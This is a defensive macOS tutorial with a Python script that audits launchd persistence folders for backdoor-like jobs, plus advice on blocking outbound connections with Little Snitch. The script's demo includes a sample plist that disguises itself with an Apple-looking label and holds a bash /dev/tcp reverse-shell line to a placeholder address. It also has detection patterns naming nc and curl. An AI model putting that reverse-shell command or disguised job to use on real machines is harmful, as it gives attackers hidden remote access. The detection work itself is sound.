As described in the previous tutorial, OSX Backdoor – Persistence, it is easy to plant a simple backdoor on any OSX system. Because our backdoor consists of nothing more than a Launch Agent and a shell script, it is essentially invisible to the typical user: there is no app icon, no window and no Dock entry. As more and more software is installed on a system, it becomes harder to notice this kind of malware before it does damage.
A backdoor is useless to its operator if it cannot call home, so blocking the outbound reverse connection is the key defense against practically any form of backdoor. A good first step is always to check your Launch Agents, Launch Daemons, and Startup Items for jobs you did not install yourself (launchctl list shows what launchd currently has loaded for your user):
~/Library/StartupItems
~/Library/LaunchAgents
/Library/StartupItems
/Library/LaunchDaemons
/Library/LaunchAgents
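Reading every plist in those folders by hand gets tedious, so here is an added script (not code from the original post or its backdoor) that does the audit: it parses each launchd job, reports what it executes and when it fires, and flags the traits a shell-script backdoor tends to have. The directory list is the one above plus Apple's /System/Library/LaunchAgents and /System/Library/LaunchDaemons (an assumption on my part: they are protected, but worth diffing). The two sample jobs, the label com.apple.softwareupdated and the address 192.0.2.10 are constructed for the demo; a flag means "review this", not "this is malware", since some legitimate updaters also run scripts from the home directory.

```python
#!/usr/bin/env python3
"""Audit launchd persistence directories for jobs worth a second look.

Added example, not the post's own code. Parses every .plist in the
persistence directories, reports what each job runs and when, and flags
the traits a shell-script backdoor usually has. StartupItems are folders
rather than plists, so only their StartupParameters.plist is parsed.
"""
import os
import plistlib
import tempfile

# The directories named in the post, plus Apple's own (assumption: worth diffing).
PERSISTENCE_DIRS = [
    "~/Library/StartupItems", "~/Library/LaunchAgents",
    "/Library/StartupItems", "/Library/LaunchDaemons", "/Library/LaunchAgents",
    "/System/Library/LaunchAgents", "/System/Library/LaunchDaemons",
]
# Interpreters and network tools that legitimate jobs rarely exec directly.
INTERPRETERS = {"sh", "bash", "zsh", "ksh", "python", "python3", "perl",
                "ruby", "osascript", "nc", "ncat", "curl"}
# Locations an unprivileged user can write to.
USER_WRITABLE_PREFIXES = ("/Users/", "/tmp/", "/private/tmp/",
                          "/var/tmp/", "/private/var/tmp/")
# launchd keys that decide when a job fires.
TRIGGER_KEYS = ("RunAtLoad", "KeepAlive", "StartInterval",
                "StartCalendarInterval", "WatchPaths")


def job_argv(job):
    """argv launchd would exec for a parsed job dict, or [] if it has none."""
    if "ProgramArguments" in job:
        return [str(a) for a in job["ProgramArguments"]]
    if "Program" in job:
        return [str(job["Program"])]
    return []


def analyze_job(job):
    """Summarize one launchd job: what runs, when it fires, and why it looks odd."""
    argv = job_argv(job)
    flags = []
    if not argv:
        flags.append("no Program/ProgramArguments")
    elif os.path.basename(argv[0]) in INTERPRETERS:
        flags.append("execs interpreter %s directly" % os.path.basename(argv[0]))
    for arg in argv:
        if arg.startswith(USER_WRITABLE_PREFIXES):
            flags.append("references user-writable path %s" % arg)
        if any(p.startswith(".") and p not in (".", "..") for p in arg.split("/")):
            flags.append("hidden path component in %s" % arg)
    if "/dev/tcp/" in " ".join(argv):
        flags.append("bash /dev/tcp reverse-shell idiom")
    if "-c" in argv:
        flags.append("inline command string (-c)")
    return {"label": job.get("Label", "<no Label>"), "argv": argv,
            "triggers": [k for k in TRIGGER_KEYS if k in job], "flags": flags}


def scan_dirs(dirs=PERSISTENCE_DIRS):
    """Parse every .plist directly under the given dirs; missing dirs are skipped."""
    reports = []
    for d in dirs:
        d = os.path.expanduser(d)
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            path = os.path.join(d, name)
            if not name.endswith(".plist") or not os.path.isfile(path):
                continue
            try:
                with open(path, "rb") as fh:
                    rep = analyze_job(plistlib.load(fh))
            except Exception as exc:  # malformed plist: report, do not skip
                rep = {"label": "?", "argv": [], "triggers": [],
                       "flags": ["unparseable plist: %s" % exc]}
            rep["path"] = path
            reports.append(rep)
    return reports


# Constructed samples: a backdoor hiding behind an Apple-looking label, and a
# benign agent that launches a bundled helper (not taken from the post).
SAMPLE_BACKDOOR = {"Label": "com.apple.softwareupdated",
                   "ProgramArguments": ["/bin/bash", "-c",
                                        "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"],
                   "RunAtLoad": True, "StartInterval": 60}
SAMPLE_BENIGN = {"Label": "com.example.helper",
                 "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/helper"],
                 "RunAtLoad": True}


def demo():
    """Write the samples to a temp LaunchAgents dir, scan it, return the reports."""
    d = tempfile.mkdtemp(prefix="launchagents_")
    for job in (SAMPLE_BACKDOOR, SAMPLE_BENIGN):
        with open(os.path.join(d, job["Label"] + ".plist"), "wb") as fh:
            plistlib.dump(job, fh)
    return scan_dirs([d])


if __name__ == "__main__":
    # Demo output first, then the real directories of this machine.
    for rep in demo() + scan_dirs():
        print("%-6s %s" % ("REVIEW" if rep["flags"] else "ok", rep["path"]))
        print("       label=%s triggers=%s exec=%s" % (
            rep["label"], ",".join(rep["triggers"]) or "-", " ".join(rep["argv"])))
        for f in rep["flags"]:
            print("       ! " + f)
```

Run it as the user whose agents you want to audit (and once with sudo for the /Library daemons); anything marked REVIEW should be traced back to the software that installed it before you delete the plist and unload the job.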
Checking these common locations will catch a lot of automatically started tasks, but it only finds what is already on disk. Little Snitch is a very powerful tool that catches outgoing connections before they are made, whatever started them.
When our backdoor attempts to call home, Little Snitch holds the outgoing connection and asks whether to allow it; denying it blocks the backdoor:
This tool is very useful for monitoring your computer's network activity. Whether software is running in a GUI or hidden in the background, no connection is made without your approval, and rules can be set to allow or block connections by process, host and port. The one caveat is that the protection is only as good as your answers: click Allow on a prompt you do not recognize and the backdoor gets a permanent rule, so treat any unknown process that wants to reach an unknown host as hostile until you have traced it back to the software that installed it. Little Snitch is a paid product from Objective Development. Congratulations, you blocked your own backdoor.